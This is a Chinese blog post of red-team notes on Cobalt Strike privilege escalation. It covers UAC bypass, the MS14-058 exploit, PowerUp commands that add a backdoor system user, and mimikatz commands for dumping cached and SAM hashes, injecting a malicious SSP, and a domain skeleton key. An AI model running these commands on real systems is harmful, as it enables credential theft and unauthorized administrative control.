首页 > 其他分享 >CobaltStrike权限提升

CobaltStrike权限提升

时间:2023-01-12 00:44:06浏览次数:55  
标签:密码 提权 Beacon 管理员 提升 CobaltStrike UAC 权限

BypassUAC

  UAC 是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。可以通过UAC漏洞来获取一个特权文件副本,也可以使用DLL劫持进行代码执行。

  在Beacon中可以查看上线主机的所属组以及UAC等级。

    shell whoami /groups                        

    

  权限为管理员权限

    

    

  Beacon check in 后,就会获得高权限的会话。

  

CVE提权

  例如,使用ms14-058进行提权,在CS脚本控制器中下载相关脚本,同上面bypassuac一样进行操作即可

 

powerup提权

  powerUp可以寻找可能存在漏洞的地方,辅助我们进行提权。

  导入powerUp.ps1脚本,执行命令即可寻找漏洞

powershell-import PowerUp.ps1
powershell Invoke-AllChecks

  

查看权限
shell isacls "应用"
icacls 查看权限 F表示完全控制

增加系统用户
powershell Install-ServiceBinary -ServiceName Protect_2345Explorer -UserName ocean12345 -Password 123456
服务名字为想要关闭的服务

...

哈希凭证获取

    

  

  

mimikatz

  CS Beacon中集成了mimikatz,可以直接运行相关命令进行相关操作


!lsadump::cache
获取缓存凭证,默认情况下 Windows 会缓存最近10个密码哈希

!lsadump::sam
获取本地账户密码哈希,该命令与 hashdump 比较类似

misc::cmd
如果注册表中禁用了 CMD ,就重新启用它

!misc::memssp
注入恶意的 Windows SSP 来记录本地身份验证凭据,这个凭证存储在“C:\windows\system32\mimilsa.log”中

misc::skeleton
该命令仅限域内使用。该命令会给所有域内用户添加一个相同的密码,域内所有的用户都可以使用这个密码进行认证,同时原始密码也可以使用,其原理是对 lsass.exe 进行注入,重启后会失效。

process::suspend [pid]
挂起某个进程,但是不结束它

process::resume [pid]
恢复挂起的进程

...

   

  同样也可以在视图中利用mimikatz

  

标签:密码,提权,Beacon,管理员,提升,CobaltStrike,UAC,权限
From: https://www.cnblogs.com/CatG0d/p/CobaltStrike_privilegeEscalation.html

相关文章